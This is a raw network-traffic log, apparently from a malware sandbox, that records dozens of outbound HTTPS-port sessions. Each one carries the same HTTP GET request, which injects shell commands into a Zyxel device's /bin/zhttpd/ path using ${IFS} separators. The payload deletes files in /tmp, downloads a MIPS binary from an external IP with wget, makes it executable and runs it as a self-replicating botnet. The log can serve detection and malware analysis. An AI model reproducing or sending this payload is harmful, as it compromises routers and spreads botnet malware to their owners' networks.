                                                Jan 12, 2024 18:24:37.913407087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5041192.168.2.1335072161.16.129.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.913439035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5042192.168.2.1348616196.121.238.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.913497925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5043192.168.2.134318838.199.226.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.913522959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5044192.168.2.133412413.21.96.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.913566113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5045192.168.2.1353856203.98.17.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.913609982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5046192.168.2.134206842.34.126.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.913650036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5047192.168.2.134048684.134.207.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.913697958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5048192.168.2.13399304.158.199.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.913727999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5049192.168.2.1348538109.38.152.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.913774967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5050192.168.2.135007453.39.170.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.917453051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5051192.168.2.133289847.20.115.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.917485952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5052192.168.2.1334298133.24.80.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.917545080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5053192.168.2.1358548133.51.13.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.917577982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5054192.168.2.133439289.41.230.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.917610884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5055192.168.2.1337618128.171.222.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.917671919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5056192.168.2.1353652118.235.193.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.917694092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5057192.168.2.1338186213.150.160.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.917749882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5058192.168.2.1340644128.215.26.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.917787075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5059192.168.2.1347354140.93.65.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.930301905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5060192.168.2.135695650.241.70.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.930350065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5061192.168.2.135423045.186.83.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.930393934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5062192.168.2.1333298164.77.105.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.930443048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5063192.168.2.1357032159.154.225.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.930511951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5064192.168.2.1351548185.36.225.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.930574894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5065192.168.2.133719699.170.103.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.930634975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5066192.168.2.1348124134.38.179.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.930675030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5067192.168.2.134615013.221.108.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.930737972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5068192.168.2.1356244105.67.130.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.930779934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5069192.168.2.1344336175.206.252.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.930845022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5070192.168.2.134042486.174.19.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.930867910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5071192.168.2.1359390183.240.93.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.930905104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5072192.168.2.134724871.117.83.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.930974960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5073192.168.2.136090018.150.72.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.931041002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5074192.168.2.1359256223.162.60.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.931083918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5075192.168.2.1357774212.221.55.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.931142092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5076192.168.2.1342002177.150.87.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.931174040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5077192.168.2.1357430206.114.129.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.931240082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5078192.168.2.134118698.92.169.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.931303024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5079192.168.2.1348188167.67.162.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.931338072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5080192.168.2.133280625.240.209.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.931382895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5081192.168.2.1340236105.103.198.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.931443930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5082192.168.2.1347892121.220.168.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.931512117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5083192.168.2.1335764151.255.33.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.931576967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5084192.168.2.135028280.162.97.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.931617975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5085192.168.2.133674834.204.252.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.931677103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5086192.168.2.1336588100.208.238.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.931730986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5087192.168.2.1343666154.147.187.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.931780100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5088192.168.2.1357352110.191.12.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.931859970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5089192.168.2.13374962.39.185.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.931905031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5090192.168.2.1360566212.159.121.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.931946993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5091192.168.2.1344078112.108.190.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.931994915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5092192.168.2.1339754132.212.139.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.932073116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5093192.168.2.1354656123.180.53.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.932126045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5094192.168.2.134280697.249.220.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.932184935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5095192.168.2.134900098.161.41.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.932234049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5096192.168.2.1356390108.183.143.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.932293892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5097192.168.2.134306488.56.243.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.932349920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5098192.168.2.1335198197.54.124.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.932411909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5099192.168.2.135476418.82.144.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.932471991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5100192.168.2.1347404141.190.135.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.932532072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5101192.168.2.1351636159.133.116.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.932588100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5102192.168.2.1345706150.41.9.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.932646990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5103192.168.2.1341298165.5.205.202443
                                                TimestampBytes transferredDirectionData
